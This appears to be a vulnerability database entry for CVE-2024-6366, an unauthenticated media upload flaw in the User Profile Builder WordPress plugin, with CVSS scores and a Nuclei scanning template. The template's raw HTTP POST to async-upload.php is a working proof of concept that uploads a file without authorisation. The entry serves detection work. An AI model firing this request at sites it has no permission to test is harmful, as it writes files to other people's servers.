Lucene search

ProjectDiscoveryNUCLEI:CVE-2024-6366

HistoryJul 29, 2024 - 5:07 p.m.

User Profile Builder < 3.11.8 - File Upload

2024-07-2917:07:32

ProjectDiscovery

github.com

cve

wpscan

file upload

wordpress plugin

intrusion detection

profile builder

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

7.1

Confidence

High

EPSS

0.001

Percentile

21.8%

JSON

The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.

id: CVE-2024-6366

info:
  name: User Profile Builder < 3.11.8 - File Upload
  author: securityforeveryone
  severity: high
  description: |
    The User Profile Builder WordPress plugin before 3.11.8 does not have proper authorisation, allowing unauthenticated users to upload media files via the async upload functionality of WP.
  reference:
    - https://wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/
    - https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6366
  classification:
    cve-id: CVE-2024-6366
    epss-score: 0.00043
    epss-percentile: 0.09351
  metadata:
    vendor: cozmoslabs
    product: user-profile-builder
    framework: wordpress
    publicwww-query: "/wp-content/plugins/profile-builder"
  tags: cve,cve2024,wpscan,file-upload,instrusive,wp-plugin,wordpress,wp,profile-builder

flow: http(1) && http(2)

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"/plugins/profile-builder")'
        internal: true

  - raw:
      - |
        POST /wp-admin/async-upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="wppb_upload"

        true
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="meta_name"

        {{filename}}.gif
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="_wpnonce"

        e8
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="action"

        upload-attachment
        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="async-upload"; filename="{{filename}}.gif"
        Content-Type: image/jpeg

        GIF89a

        ------WebKitFormBoundary7MA4YWxkTrZu0gW--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"success":true'
          - '"id"'
          - '"uploadedTo"'
        condition: and

      - type: word
        part: header
        words:
          - 'Content-Type: text/plain'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c097589d319c657b57ec2360a4918baeb01717391160a286990beb6798a607bf02204f0b692c85592fede96803d81734e118aea1c204b84e51a0e212e8d0c557c868:922c64590222798bb761d5b6d8e72950

References

nvd.nist.gov/vuln/detail/CVE-2024-6366

wpscan.com/vulnerability/5b90cbdd-52cc-4e7b-bf39-bea0dd59e19e/

www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-6366

CVSS3

9.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

AI Score

7.1

Confidence

High

EPSS

0.001

Percentile

21.8%

JSON

Related for NUCLEI:CVE-2024-6366